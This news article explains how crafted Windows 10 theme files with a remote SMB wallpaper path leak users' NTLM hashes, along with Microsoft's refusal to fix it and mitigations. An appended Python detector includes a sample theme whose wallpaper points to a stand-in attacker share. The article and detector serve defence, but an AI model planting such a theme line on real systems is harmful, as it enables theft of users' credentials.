Windows 10 themes can be used to steal passwords; Microsoft refuses to fix it

Researchers have found that specially crafted Windows 10 theme and theme-pack files can be used in a pass-the-hash attack to steal Windows account credentials from victims.

Introduction to Windows 10 themes

Windows lets users create custom themes with their own colors, sounds, mouse cursors and wallpaper for the operating system. Users can then switch between themes to change the look of the system.

Modifying a Windows theme

Theme settings are saved in the %AppData%\Microsoft\Windows\Themes folder in a file with the .theme extension, for example CustomDark.theme.

(Figure: a Windows 10 theme file)

Users can also right-click the active theme and choose "Save theme for sharing" to share it with other users. The theme is then packaged as a ".deskthemepack" file.

This desktop theme pack can then be distributed by e-mail or as a download and installed by double-clicking it.

Stealing Windows credentials with custom theme files

Last weekend, security researcher Jimmy Bayne (@bohops) found that a specially crafted Windows theme can be used to carry out a pass-the-hash attack.

A pass-the-hash attack steals the Windows login name and password hash by luring the user into accessing a remote SMB share that requires authentication.

When accessing a remote resource, Windows automatically logs in to the remote system by sending the NTLM hash of the current user's login name and password.

In a pass-the-hash attack, the credentials that are sent are captured by the attacker, who can then crack the password hash to recover the plaintext password and log in with the victim's user name and password.

A BleepingComputer test found that a simple password hash can be cracked in only 4 seconds.

(Figure: an NTLM hash cracked in 4 seconds)

In the method found by Bayne, an attacker creates a specially crafted theme file whose desktop wallpaper setting points to a resource that requires remote authentication, as shown in the following figure:

(Figure: a malicious Windows theme file)

When Windows tries to access the remote resource that requires authentication, it automatically logs in to the remote share by sending the NTLM hash and login name of the currently logged-in account.

(Figure: automatic login to the remote share)

The attacker can then capture the credentials and convert the NTLM hash into plaintext with a dedicated script, as shown below:

(Figure: the captured Windows credentials)

The pass-the-hash attack sends the credentials of whatever account the user is logged in to Windows with, including Microsoft accounts, so this kind of attack is potentially very harmful.

Moreover, Microsoft has started migrating local Windows 10 accounts to Microsoft accounts, so a remote attacker could easily reach the remote services Microsoft provides, including e-mail, Azure and remote corporate networks.

Bayne said the issue was reported to Microsoft earlier this year, but Microsoft said it is a "feature by design" and will therefore not be fixed.

How to deal with malicious theme files

Bayne recommends that users block the .theme, .themepack and .desktopthemepackfile extensions, or re-associate them with another application, although this breaks the Windows 10 theme feature. In addition, Windows users can set the Group Policy "Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to "Deny all", which prevents NTLM hashes from being sent to remote hosts; depending on the configuration, however, this can cause problems with using remote shares in an enterprise environment.

Finally, BleepingComputer recommends that users enable multi-factor authentication on their Microsoft accounts to prevent remote access after an attacker successfully steals credentials.
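As an added illustration of the detection side of the mitigation advice above (example code, not from the article or from Bayne), a small Python checker that parses a .theme or .themepack INI and flags wallpaper or slideshow paths pointing to a UNC share or URL, which are the references that would trigger an outbound NTLM authentication when the theme is applied. The section and key names follow the Windows .theme INI layout; the sample theme text and the host name in it are constructed.

```python
import configparser
import re
from typing import List, Tuple

# Image-location keys in a Windows .theme / .themepack INI that the shell loads
# when the theme is applied. [Control Panel\Desktop] Wallpaper is the setting
# abused in the research above; [Slideshow] ImagesRootPath is the slideshow folder.
IMAGE_KEYS = {
    "control panel\\desktop": {"wallpaper"},
    "slideshow": {"imagesrootpath"},
}

# Remote = a UNC path (\\host\share, \\?\UNC\...) or a URL scheme such as http://.
# Loading either makes Windows attempt an outbound authentication to that host.
REMOTE_RE = re.compile(r"^(\\\\|//|[A-Za-z][A-Za-z0-9+.\-]*://)")


def is_remote_path(value: str) -> bool:
    return bool(REMOTE_RE.match(value.strip().strip('"')))


def find_remote_image_refs(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for each image setting that points off-host."""
    # interpolation=None: values contain %SystemRoot% and backslashes;
    # strict=False: tolerate duplicate keys; configparser lowercases key names.
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(theme_text)
    hits = []
    for section in cp.sections():
        wanted = IMAGE_KEYS.get(section.lower())
        if not wanted:
            continue
        for key, value in cp.items(section):
            if key in wanted and is_remote_path(value):
                hits.append((section, key, value))
    return hits


# Constructed sample theme: the wallpaper points at a UNC share on a placeholder
# host (would trigger outbound NTLM auth); the slideshow path is local.
SAMPLE_THEME = """[Control Panel\\Desktop]
Wallpaper=\\\\attacker-host.example\\share\\img0.jpg

[Slideshow]
ImagesRootPath=%SystemRoot%\\Web\\Wallpaper\\Windows
"""

if __name__ == "__main__":
    for sec, key, val in find_remote_image_refs(SAMPLE_THEME):
        print(f"remote image reference: [{sec}] {key}={val}")
```

Theme files written by Windows are often UTF-16 encoded, so decode the file before passing its text to find_remote_image_refs.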